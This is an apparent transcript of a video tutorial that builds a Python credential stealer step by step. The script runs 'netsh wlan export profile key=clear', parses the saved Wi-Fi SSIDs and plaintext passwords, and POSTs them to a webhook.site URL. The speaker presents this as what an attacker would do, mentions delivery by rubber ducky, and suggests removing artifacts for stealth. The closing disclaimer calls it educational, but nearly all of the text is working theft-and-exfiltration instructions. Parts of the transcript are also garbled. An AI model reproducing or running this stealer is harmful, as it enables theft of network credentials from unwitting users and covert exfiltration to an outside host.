I'm going to show you how it's possible to use Python to steal a Wi-Fi password in literal seconds. If you don't believe me, watch this. Okay, that took all about 1 second there, and you can see that I've got my SSID and the password for the SSID as well. It's all about Python's magic to hack the Wi-Fi password within minutes. And if you want to learn Python, I prefer you to watch this video. That's link are in my description. Now, if you've ever used your Wi-Fi and you've gone and typed in a password for a network and you said, remember this network, well, guess what? Your Wi-Fi password actually gets stored in plain text on your machine. Let me show you how this works. So in a Windows command prompt, what I'm going to type in really quick is net shw lan show profile. And this is going to show me all these saved profiles that I have on my computer. You can see that I have one SSID up. Please don't hack me. Now, this is not showing any password yet, but we can extract that password pretty easily. All we have to do is type in net shwlen export, and then we can say profile key equals clear meaning. We want to see the password in clear text, hit enter, and now it gets saved to a file called Wi-Fi, and then it gives you the SSID name. So, if there were multiple SSIDs stored on your computer, and if you're following along, you might have 50. Who knows how many times you've connected to Wi-Fi, especially if you're on a laptop. So this gets saved to an XML file. Now, when I open up the XML file, you can see that I get the name of the SSID, which is right here, the please don't hack me. And then if I come down just a little bit to this key material right here, this is my password 1234567 So what I'm going to do is I'm going to show you how to run this command, automatically grab the SSID, automatically grab the password, and then send it over to a website such as this webhook.site where we can pull down the data. So in a real attack scenario, you can imagine that an attacker would run this malicious code, and then all it does is communicate back to a website, something malicious that they're hosting, and grabs your data. It can be done in a second, like you saw just in the beginning. So let's jump into the coding part. Now I'm going to be coding in Linux because that's my preferred place to code. However, if you want to follow along, any text editor or IDE will work. Now I'm going to come in here and just say mousepadstealer.py, and from here what we're going to do is we're going to go ahead and save this. Go ahead and first import subprocess. So we're going to bring in subprocess, and the reason we're going to do that is because we're going to want to use Python apologies here. We're going to want to use Python to execute a Windows command. And what Windows command is that? Well, it's the one that you just saw us execute. It's the netsh command. So we're going to declare command is equal to subprocess.run, and then we're going to say something like this. We're going to say netsh, and everywhere we had a space, we're going to have to do something like this. So wlan space export space profile, and then key is equal to clear, and this is going to capture our output, and we're going to say is equal to true, all right? And we're going to give this a standard output decode, all right? And when we run this, this will then run the command for us as if we were running it in a Windows command line. Very nice, very easy. So the next thing that we're going to need to do is grab the current directory that we are working with. So we're going to say grab current directory. And the way to do that is we can just declare a variable called path and set that equal to OS get CWD. So we're going to get the current working directory, and we also have to import OS. So let's make sure we do that. All right, and now we can add a few more things. So what we want to do is we want to go in, grab that file named Wi-Fi, whatever our SSID is, XML. We're going to grab that and we're going to extract the name in there, and we're going to extract the key in there. So we're going to need to do some stuff in order to do that. So a few things that I want to do first and foremost is I want to first create a file. So let's create a file, and in this file I'm going to create a password file, because eventually we're going to store all of our stuff in a password file. So we're going to say open passwords.txt like this, and we're going to make it writable, okay? And then we're going to say password file dot write, and we're just going to say something like, hello, sir, here are your passwords, all
Here
right?
are your
And we'll
passwords.
do maybe
Right.
like a new line here, maybe 2 new lines. Why not? Okay, and then good practice. Dix takes that. We close this, so we're going to go ahead and close the file that we just created. So as of right now, we're going to create a file, we're going to write a little bit to it, and then we're going to close it. We're going to execute a command. We're going to grab a working directory, and we need to put the data that we're gathering into lists. So I'm going to create a few lists in here. I'm going to do something like this list, and we're going to say Wi-Fi files is equal to an empty list. Wi-Fi name is equal to an empty list, and Wi-Fi password is equal to an empty list. You'll see why we're doing this here in a second. So far we've got this out. Now we need to do what I call the hackies. We're going to do the hackies. All right, so with this in mind, we're going to go ahead and write a for loop. So follow along with me here. We're going to say for file name, and we're going to say in os.list dir of path. So basically what we're doing here is we are saying, hey, for file name can be whatever you want. But for item in this lister path, so we've got the path. So any file within this lister path is what we're after. We want to make sure that we match the file name. We don't want to iterate through every file. That could take a lot of work. So what we're going to say is if file name dot starts with, and we're going to say Wi-Fi because we saw the file started with Wi-Fi. All files will start with Wi-Fi, and this is important, and file name dot ends with XML. Then we can start doing some fun stuff. So we're going to indent again, and we're going to say Wi-Fi files dot append, and we're going to append the file name. So any Wi-Fi file that we grab, we're going to append it here into our Wi-Fi files. All right. So this will give us every single SSID that we have. Now we have to iterate through those files to figure out the passwords of those SSIDs. So we're going to do that next. I'm going to add some new lines in here just to make some room and bring this back up. So we're going to say for I in Wi-Fi files. So for whatever we're about to iterate through, and we're going to open a file, we're going to say with open, and then we're going to open file I. So everything within this list, everything that comes back, we're going to open that file and we're going to read it. And we're just going to declare this as F. Okay. And we're going to say for line in f.readLines. So we're going to read every single line within the file that we're opening from this for loop. So we're going to iterate through the files that we get. Then we're going to read those files because we want to find the data that's in there. Okay, we're going to say if name inline. And why are we saying if name inline? Well, if we come back here, you can see that name is in here. So we've got name, we're going to pull down name, and we're also going to pull down key material. So we want to pull down both of these things. So the first thing that we're going to do is say if name inline. Okay, so if name exists within the file that we're reading, then what I want to do is I want to strip out any spaces. So I'm going to say stripped is equal to line.strip. I'm also going to say front and back. So front means I want to strip. I'll show you here. Let's do stripped is equal to 6. And I want to take off the first 6 items. And I'll show you what that is. So if we come here, we go 0, 1, 2, 3, 4, 5. So we're going to stop at 6 in our indexing. And then we're also going to want to take off the last 7. There's a forward slash in here. So all we're doing is we're removing any spaces because we will pull this space down when we pull down name because we're pulling the whole line. We're going to strip the spaces with the dot strip method. We're going to come in here and we're going to take off the name on the front and on the back. We're going to take off the slash name. So that way we can pull down this information without anything else in the way. So we can come in here, we could say back is equal to front, and we're going to take off -7. So take off the last 7 now. So what we're going to say is Wi-Fi dot append back. Now we need to do a very similar if statement for key material. So if key material is in line, then we're going to also strip these out. So we're going to say stripped is equal to line dot strip. Same stuff right here. We're going to say front is equal to stripped. And this time it's going to be a character count of 13. Pull off key material. And then we're going to say back is equal to strip out your front. I'm sorry. And that's going to be a -14. So we add that / in there. That's one extra character. And now we're going to say, let me make some more room in here. We're going to say Wi-Fi password dot append back. Okay, so before I continue, let's go back through this and we're going to reiterate everything that we said. So that way it makes sense. So we created 3 lists. Remember that in these 3 lists, they're empty. So what we're going to do first is we're going to come in and we're going to look for any files with the name of Wi-Fi in the path that we provided. All right, so that's our current working directory. It's wherever we run the script at, that's where the file is going to get written. Now we come through, we gather all the files to start with Wi-Fi and end with XML. And in those files, we're going to search through those and we're going to look for anything with the line of name in it. And we're going to pull that out and then we're going to strip out the front and back of that. So that way we just have a Wi-Fi name and we're going to append that to the list. So every Wi-Fi name we get, we're going to append that. And then we also have another list with key material. So those are our passwords. So this loop that we run through, it's going to be a 1-to-1 match. So we'll have 2 different lists, but item 0 in the first list is going to be the Wi-Fi SSID name, and then item 0 in the second list is going to be the password of that corresponding SSID. Same thing, if there were 10 SIDs, well, the 9th item in the list would match the 9th password in the list and so forth. So in order to pull that down, we need to print this out in a way that we can read both lists at the same time. So what we're going to do here is we're going to say for X and Y in, and we're going to use the zip command. This is going to allow us to combine both lists. We're going to combine Wi-Fi name and Wi-Fi password, and then we're going to say something like this: sys.standard output is equal to, we're going to open passwords.txt and we're going to append this time to passwords, and we use the size command. Here we actually need to import sys. I've not done that yet. So import sys, and this is going to output everything that is put to the terminal, or printed out, I should say, into a file. So now we're going to print out the following. We're going to say SSID plus X password plus Y, and then we're going to do a separator of a new line. All right. So this should go through the list, iterate, say, okay, item 0. I'm going to get the SSID, that's going to be X. I'm going to get the SSID, it's going to be Y. And then we're going to have a separator in here of a new line. And then we'll do that again and again, appending to this password.txt file that we created at the beginning now. Once that's all said and done, we're going to say SCs standard out and we're going to close that. So this will allow us to do the hackies if we run this in its current condition. This will actually save to a file. So let's go ahead and do that, and small typo fix before we run this. There are 2 SS and password. Let me save that. And now we're going to run it. Okay, so I run python stealer.py. Come in here, you see the profile gets generated and passwords. .txt gets opened. If I bring this over, you can see that. Hello, sir. Here are your passwords. Side, please don't hack me. And password 1234567 Perfect. All right, last step. We got to ship this off. So In order to do that, we can use a website like webhook.site. If you just go to webhook.site, you should get a unique URL. You can just go ahead and copy that to the clipboard using this button or copy paste. And what we're going to do is we're going to come in here and we're going to come to the top, and I'm going to put in here a URL. So we're going to just call this Stealer URL, and then we'll just say URL is equal to paste that and save it. Now we need to import requests. So requests are going to allow us to send a request to the website. So we're going to say import requests now by default request. Doesn't come with Python. So if you do not have it installed, one thing that you can do is just do a pip install request. I've already got it installed, but if you hit enter, it will say whether it's installed or not, or it'll automatically install it for you. So from here, we need to send out our file. So we've got this nice file that we created here, and now we need to send it out. So what I'm going to do is come in here and I'm going to say, okay, we do the hackies now. We send the hackies, right? And we're going to send this over. We're going to say with open. We're going to open that password file that we've been creating and appending to. We're going to do an RB, which means that we're going to read only in binary, and then we're going to go ahead and save this as F again. And we're going to say R is equal to requests dot post. We're going to send a post request to our URL that we have, and we're going to send the data of F. All right, let's save this and let's try shipping this off one more time. Make sure everything works in the way that we intended. Okay, and I'm going to run python stealer.py, give that a go. And look at here, we've got hello, sir. Here are your passwords, and we've got the SSID and the password of this. So hopefully this was informative for you. This is a fun exercise in using Python, but also it should be informative in the sense that, hey, don't click store your SSID or store your Wi-Fi password unless you really wanted to, because somebody can run a script like this or use a little rubber ducky, plug it in your computer, and within seconds, as you've seen, your Wi-Fi password is now known to them, and you would not be any the wiser. Now, in theory, this script that we wrote doesn't go in and delete the files. It does leave some artifacts behind, but that's easy to add into our Python script and make it more stealthy. So this isn't from an attacker's perspective. It's showing you what an attacker can do with Python or with other code and how they can be malicious. And hopefully that gets you thinking about security in your own personal security from an educational standpoint. If you enjoyed this video, please do consider subscribing to the channel again. 70 of you are not subscribed to the channel. If all 70 of you would subscribe, we would have 1,000 subscribers. So please do consider subscribing to the channel to see more great content like this. Again, thank you so much for joining me, and I will see you over in the next video.